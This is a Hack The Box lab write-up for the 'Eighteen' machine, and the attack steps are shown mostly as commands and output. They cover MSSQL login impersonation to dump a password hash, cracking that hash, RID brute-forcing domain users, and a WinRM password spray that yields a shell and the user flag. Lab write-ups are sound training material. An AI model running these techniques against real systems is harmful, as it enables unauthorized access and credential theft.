HTB Eighteen

Enumeration

Given credentials

1
kevin / iNa2we6haRj2gaw!

TCP Port Scanning using NMAP

1
└──╼ [★]$ nmap -sCV -p- -T4 10.10.11.95
2
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-19 10:23 CST
3
Nmap scan report for eighteen.htb (10.10.11.95)
4
Host is up (0.0024s latency).
5
Not shown: 65532 filtered tcp ports (no-response)
6
PORT     STATE SERVICE  VERSION
7
80/tcp   open  http     Microsoft IIS httpd 10.0
8
|_http-server-header: Microsoft-IIS/10.0
9
|_http-title: Welcome - eighteen.htb
10
1433/tcp open  ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RC0+
11
| ms-sql-info:
12
|   10.10.11.95:1433:
13
|     Version:
14
|       name: Microsoft SQL Server 2022 RC0+
15
|       number: 16.00.1000.00
16
|       Product: Microsoft SQL Server 2022
17
|       Service pack level: RC0
18
|       Post-SP patches applied: true
19
|_    TCP port: 1433
20
| ms-sql-ntlm-info:
21
|   10.10.11.95:1433:
22
|     Target_Name: EIGHTEEN
23
|     NetBIOS_Domain_Name: EIGHTEEN
24
|     NetBIOS_Computer_Name: DC01
25
|     DNS_Domain_Name: eighteen.htb
26
|     DNS_Computer_Name: DC01.eighteen.htb
27
|     DNS_Tree_Name: eighteen.htb
28
|_    Product_Version: 10.0.26100
29
|_ssl-date: 2025-12-19T22:56:04+00:00; +6h30m14s from scanner time.
30
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
31
| Not valid before: 2025-12-19T22:48:43
32
|_Not valid after:  2055-12-19T22:48:43
33
5985/tcp open  http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
34
|_http-server-header: Microsoft-HTTPAPI/2.0
35
|_http-title: Not Found
36
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
37

38
Host script results:
39
|_clock-skew: mean: 6h30m13s, deviation: 0s, median: 6h30m13s

Endpoint Fuzzing Using NMAP

1
login                   [Status: 200, Size: 1961, Words: 602, Lines: 66, Duration: 626ms]
2
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 2253, Words: 674, Lines: 74, Duration: 649ms]
3
register                [Status: 200, Size: 2421, Words: 762, Lines: 76, Duration: 546ms]
4
admin                   [Status: 302, Size: 199, Words: 18, Lines: 6, Duration: 9ms]
5
# Priority ordered case-sensitive list, where entries were found [Status: 200, Size: 2253, Words: 674, Lines: 74, Duration: 674ms]
6
features                [Status: 200, Size: 2822, Words: 849, Lines: 88, Duration: 547ms]
7
logout                  [Status: 302, Size: 189, Words: 18, Lines: 6, Duration: 5ms]
8
dashboard               [Status: 302, Size: 199, Words: 18, Lines: 6, Duration: 9ms]

Subdirectory Fuzzing Using NMAP Got nothing.

From nmap result, seems that port 80 IIS, 1433 MSSQL, and 5985 WinRm is opened.

First, doing in port 1433 MSSQL. Tools that used is mssqlclient.py from impacket and netexec.

1
└──╼ [★]$ mssqlclient.py  DOMAIN/kevin:'iNa2we6haRj2gaw!'@10.10.11.95
2
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies
3

4
[*] Encryption required, switching to TLS
5
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
6
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
7
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
8
[*] INFO(DC01): Line 1: Changed database context to 'master'.
9
[*] INFO(DC01): Line 1: Changed language setting to us_english.
10
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
11
[!] Press help for extra shell commands
12
SQL (kevin  guest@master)> SELECT name FROM master.dbo.sysdatabases;
13
name
14
-----------------
15
master
16

17
tempdb
18

19
model
20

21
msdb
22

23
financial_planner
24

25
SQL (kevin  guest@master)> SELECT name FROM master.sys.syslogins;
26
name
27
------
28
sa
29

30
kevin
31

32
appdev

We see that there are 2 other users, sa and appdev.

But kevin cant access financial_planner table.

1
SQL (kevin  guest@master)> SELECT name FROM financial_planner.sys.tables;
2
ERROR(DC01): Line 1: The server principal "kevin" is not able to access the database "financial_planner" under the current security context.
3
SQL (kevin  guest@master)>

Try to using nxc.

1
└──╼ [★]$ nxc mssql 10.10.11.95 -u kevin -p 'iNa2we6haRj2gaw!' --local-auth                                                  MSSQL       10.10.11.95     1433   DC01             [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb) (EncryptionReq:False)
2
MSSQL       10.10.11.95     1433   DC01             [+] DC01\kevin:iNa2we6haRj2gaw!
3
┌─[sg-vip-2]─[10.10.14.12]─[htb-mp-2897749@htb-kryigcaylc]─[~]
4
└──╼ [★]$ nxc mssql 10.10.11.95 -u kevin -p 'iNa2we6haRj2gaw!' --local-auth -M mssql_priv
5
MSSQL       10.10.11.95     1433   DC01             [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb) (EncryptionReq:False)
6
MSSQL       10.10.11.95     1433   DC01             [+] DC01\kevin:iNa2we6haRj2gaw!
7
MSSQL_PRIV  10.10.11.95     1433   DC01             [*] kevin can impersonate: appdev

kevin can impersonate appdev, so i tried to login as appdev.

1
SQL (kevin  guest@master)> execute as login = 'appdev'
2
SQL (appdev  appdev@master)>
3
SQL (appdev  appdev@master)> SELECT * FROM financial_planner.dbo.users;
4
  id   full_name   username   email                password_hash                                                                                            is_admin   created_at
5
----   ---------   --------   ------------------   ------------------------------------------------------------------------------------------------------   --------   ----------
6
1002   admin       admin      admin@eighteen.htb   pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133          1   2025-10-29 05:39:03
7

8
SQL (appdev  appdev@master)>

Crack hashes and get iloveyou1

Trying to get all user.

1
┌─[sg-vip-2]─[10.10.14.12]─[htb-mp-2897749@htb-kryigcaylc]─[~]
2
└──╼ [★]$ nxc mssql 10.10.11.95 -u kevin -p 'iNa2we6haRj2gaw!' --rid-brute --local-auth
3
MSSQL       10.10.11.95     1433   DC01             [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb) (EncryptionReq:False)
4
MSSQL       10.10.11.95     1433   DC01             [+] DC01\kevin:iNa2we6haRj2gaw!
5
MSSQL       10.10.11.95     1433   DC01             498: EIGHTEEN\Enterprise Read-only Domain Controllers
6
MSSQL       10.10.11.95     1433   DC01             500: EIGHTEEN\Administrator
7
MSSQL       10.10.11.95     1433   DC01             501: EIGHTEEN\Guest
8
MSSQL       10.10.11.95     1433   DC01             502: EIGHTEEN\krbtgt
9
MSSQL       10.10.11.95     1433   DC01             512: EIGHTEEN\Domain Admins
10
MSSQL       10.10.11.95     1433   DC01             513: EIGHTEEN\Domain Users
11
MSSQL       10.10.11.95     1433   DC01             514: EIGHTEEN\Domain Guests
12
MSSQL       10.10.11.95     1433   DC01             515: EIGHTEEN\Domain Computers
13
MSSQL       10.10.11.95     1433   DC01             516: EIGHTEEN\Domain Controllers
14
MSSQL       10.10.11.95     1433   DC01             517: EIGHTEEN\Cert Publishers
15
MSSQL       10.10.11.95     1433   DC01             518: EIGHTEEN\Schema Admins
16
MSSQL       10.10.11.95     1433   DC01             519: EIGHTEEN\Enterprise Admins
17
MSSQL       10.10.11.95     1433   DC01             520: EIGHTEEN\Group Policy Creator Owners
18
MSSQL       10.10.11.95     1433   DC01             521: EIGHTEEN\Read-only Domain Controllers
19
MSSQL       10.10.11.95     1433   DC01             522: EIGHTEEN\Cloneable Domain Controllers
20
MSSQL       10.10.11.95     1433   DC01             525: EIGHTEEN\Protected Users
21
MSSQL       10.10.11.95     1433   DC01             526: EIGHTEEN\Key Admins
22
MSSQL       10.10.11.95     1433   DC01             527: EIGHTEEN\Enterprise Key Admins
23
MSSQL       10.10.11.95     1433   DC01             528: EIGHTEEN\Forest Trust Accounts
24
MSSQL       10.10.11.95     1433   DC01             529: EIGHTEEN\External Trust Accounts
25
MSSQL       10.10.11.95     1433   DC01             553: EIGHTEEN\RAS and IAS Servers
26
MSSQL       10.10.11.95     1433   DC01             571: EIGHTEEN\Allowed RODC Password Replication Group
27
MSSQL       10.10.11.95     1433   DC01             572: EIGHTEEN\Denied RODC Password Replication Group
28
MSSQL       10.10.11.95     1433   DC01             1000: EIGHTEEN\DC01$
29
MSSQL       10.10.11.95     1433   DC01             1101: EIGHTEEN\DnsAdmins
30
MSSQL       10.10.11.95     1433   DC01             1102: EIGHTEEN\DnsUpdateProxy
31
MSSQL       10.10.11.95     1433   DC01             1601: EIGHTEEN\mssqlsvc
32
MSSQL       10.10.11.95     1433   DC01             1602: EIGHTEEN\SQLServer2005SQLBrowserUser$DC01
33
MSSQL       10.10.11.95     1433   DC01             1603: EIGHTEEN\HR
34
MSSQL       10.10.11.95     1433   DC01             1604: EIGHTEEN\IT
35
MSSQL       10.10.11.95     1433   DC01             1605: EIGHTEEN\Finance
36
MSSQL       10.10.11.95     1433   DC01             1606: EIGHTEEN\jamie.dunn
37
MSSQL       10.10.11.95     1433   DC01             1607: EIGHTEEN\jane.smith
38
MSSQL       10.10.11.95     1433   DC01             1608: EIGHTEEN\alice.jones
39
MSSQL       10.10.11.95     1433   DC01             1609: EIGHTEEN\adam.scott
40
MSSQL       10.10.11.95     1433   DC01             1610: EIGHTEEN\bob.brown
41
MSSQL       10.10.11.95     1433   DC01             1611: EIGHTEEN\carol.white
42
MSSQL       10.10.11.95     1433   DC01             1612: EIGHTEEN\dave.green

Foothold

Password spraying winrm 5985 using NXC winrm.

1
└──╼ [★]$ nxc winrm 10.10.11.95 -u users.txt -p 'iloveyou1' --no-bruteforce
2
WINRM       10.10.11.95     5985   DC01             [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
3
WINRM       10.10.11.95     5985   DC01             [-] eighteen.htb\DC01:iloveyou1
4
WINRM       10.10.11.95     5985   DC01             [-] eighteen.htb\DnsAdmins:iloveyou1
5
WINRM       10.10.11.95     5985   DC01             [-] eighteen.htb\DnsUpdateProxy:iloveyou1
6
WINRM       10.10.11.95     5985   DC01             [-] eighteen.htb\mssqlvc:iloveyou1
7
WINRM       10.10.11.95     5985   DC01             [-] eighteen.htb\HR:iloveyou1
8
WINRM       10.10.11.95     5985   DC01             [-] eighteen.htb\IT:iloveyou1
9
WINRM       10.10.11.95     5985   DC01             [-] eighteen.htb\Finance:iloveyou1
10
WINRM       10.10.11.95     5985   DC01             [-] eighteen.htb\jamie.dunn:iloveyou1
11
WINRM       10.10.11.95     5985   DC01             [-] eighteen.htb\jane.smith:iloveyou1
12
WINRM       10.10.11.95     5985   DC01             [-] eighteen.htb\alice.jones:iloveyou1
13
WINRM       10.10.11.95     5985   DC01             [+] eighteen.htb\adam.scott:iloveyou1 (Pwn3d!)

Got users adam.scott with password iloveyou1

1
*Evil-WinRM* PS C:\Users\adam.scott\Documents> ls
2
*Evil-WinRM* PS C:\Users\adam.scott\Documents> cd ../Desktop
3
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> ls
4

5

6
    Directory: C:\Users\adam.scott\Desktop
7

8

9
Mode                 LastWriteTime         Length Name
10
----                 -------------         ------ ----
11
-ar---        12/19/2025   2:47 PM             34 user.txt
12

13

14
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> cat user.txt
15
e59878ee5413b2f44be497730c211a17
16
*Evil-WinRM* PS C:\Users\adam.scott\Desktop>

Post-Exploitation

winpeas

Privilege Escalation

BadSuccessor